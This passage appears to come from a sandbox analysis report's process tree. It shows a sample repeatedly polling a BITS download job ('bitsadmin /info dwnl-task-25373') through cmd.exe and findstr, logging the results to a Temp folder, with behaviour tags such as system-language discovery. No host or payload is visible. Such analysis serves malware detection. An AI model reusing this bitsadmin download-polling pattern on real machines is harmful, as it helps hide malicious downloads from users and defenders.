        PID:2916
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2436
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2600
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2024
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2888
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3464
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3140
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:1864
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3604
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2332
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2756
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3800
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2716
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3940
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2116
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3320
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3432
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:4004
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2956
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2204
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3028
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:1520
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2672
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2972
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3500
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2604
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3224
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3192
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2216
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3256
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3532
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:1960
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3264
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3796
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4004
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2660
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2704
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2152
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:1520
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2448
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:4000
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3164
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3500
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2672
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:408
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3816
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2512
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3256
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3464
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2600
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:744
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2464
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2916
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2732
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:916
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2748
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3432
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2116
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:1620
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:4004
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3804
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3028
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:1736
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:1520
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3988
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3848
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2024
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2604
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3372
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3200
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:1428
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:1684
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3192
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3920
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:1964
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2828
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2268
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:972
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:4000
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3988
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:1720
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:1736
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:904
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2712
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:408
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3224
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2688
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2748
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3320
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2760
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:780
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:1964
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2464
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2948
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2704
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2728
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:920
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:1864
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3508
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:904
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2604
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2756
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:1976
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2956
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2660
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:1456
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2704
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2024
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:2712
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3760
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2852
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2660
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:1964
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3940
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3468
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3036
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:992
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:4000
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:3188
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:1944
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3912
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3816
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3920
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2024
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3760
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:2972
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:2860
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:3024
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:1808
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:3512
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:972
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:2116
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3436
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2448
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-25373 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_25373\log_bits_info.txt"
        5⤵
        
        PID:1748
      - C:\Windows\SysWOW64\bitsadmin.exe
        
        bitsadmin /info dwnl-task-25373
        6⤵
        
        PID:1752
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"
        6⤵
        
        PID:3036
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /R /V "^$"
        6⤵
        
        PID:992
    - - C:\Windows\SysWOW64\cmd.exe
        
